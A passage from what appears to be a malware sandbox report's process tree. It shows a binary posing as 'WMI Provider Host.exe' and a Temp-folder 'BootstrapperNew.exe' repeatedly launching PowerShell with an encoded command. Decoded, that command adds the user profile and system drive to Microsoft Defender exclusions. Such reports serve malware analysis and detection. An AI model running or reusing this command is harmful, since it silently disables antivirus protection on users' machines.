        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        151⤵
        
        PID:8028
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        151⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        151⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        152⤵
        
        PID:3516
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        152⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        152⤵
        
        PID:3080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        153⤵
        
        PID:3064
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        153⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        153⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        154⤵
        
        PID:6356
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        154⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        154⤵
        
        PID:440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        155⤵
        
        PID:5136
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        155⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        155⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        156⤵
        
        PID:7864
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        156⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        156⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        157⤵
        
        PID:6988
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        157⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        157⤵
        
        PID:6864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        158⤵
        
        PID:5556
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        158⤵
        
        PID:848
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        158⤵
        
        PID:1304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        159⤵
        
        PID:7044
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        159⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        159⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        160⤵
        
        PID:7144
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        160⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        160⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        161⤵
        
        PID:6636
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        161⤵
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        161⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        162⤵
        
        PID:4212
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        162⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        162⤵
        
        PID:7248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        163⤵
        
        PID:5776
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        163⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        163⤵
        
        PID:7548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        164⤵
        
        PID:6420
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        164⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        164⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        165⤵
        
        PID:5448
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        165⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        165⤵
        
        PID:7788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        166⤵
        
        PID:7460
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        166⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        166⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        167⤵
        
        PID:6292
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        167⤵
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        167⤵
        
        PID:432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        168⤵
        
        PID:7276
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        168⤵
        
        PID:7704
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        168⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        169⤵
        
        PID:5156
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        169⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        169⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        170⤵
        
        PID:4056
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        170⤵
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        170⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        171⤵
        
        PID:7852
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        171⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        171⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        172⤵
        
        PID:4140
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        172⤵
        
        PID:7376
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        172⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        173⤵
        
        PID:2892
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        173⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        173⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        174⤵
        
        PID:4540
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        174⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        174⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        175⤵
        
        PID:8188
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        175⤵
        
        PID:7596
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        175⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        176⤵
        
        PID:432
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        176⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        176⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        177⤵
        
        PID:6800
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        177⤵
        
        PID:336
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        177⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        178⤵
        
        PID:7264
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        178⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        178⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        179⤵
        
        PID:724
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        179⤵
        
        PID:7052
        
